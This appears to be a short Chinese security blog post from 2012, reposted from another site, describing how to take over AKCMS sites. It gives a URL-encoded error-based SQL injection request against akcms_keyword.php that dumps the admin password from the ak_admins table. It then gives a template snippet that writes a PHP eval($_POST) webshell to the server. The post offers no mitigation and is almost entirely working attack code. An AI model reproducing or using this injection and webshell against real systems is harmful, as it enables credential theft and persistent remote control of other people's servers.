AKCMS 后台拿Webshell

文章转自:http://www.0x80c.com/?p=56

爆管理员密码:

http://www.xxx.com/akcms_keyword.php?sid=11111%27and

%28select%201%20from%28select%20count%28*%29,concat%28%

28select%20%28select%20%28select%20concat%280x7e,0×27,

password,0×27,0x7e%29%20from%20ak_admins%20limit%200

,1%29%29%20from%20information_schema.tables%20limit%200,

1%29,floor%28rand%280%29*2%29%29x%20from%20informat

ion_schema.tables%20group%20by%20x%29a%29%20and%20%

271%27=%271&keyword=11

 

模板中写入以下内

<{php}>
fputs(fopen(“./0x80c.php”,”w”),”<?eval($_POST[0x80c]);?>”)
<{/php}>
然后

 

本文固定链接: https://www.unhonker.com/technical/685.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年09月21日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: AKCMS 后台拿Webshell | 90' s Blog|关注网络信息安全

AKCMS 后台拿Webshell:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!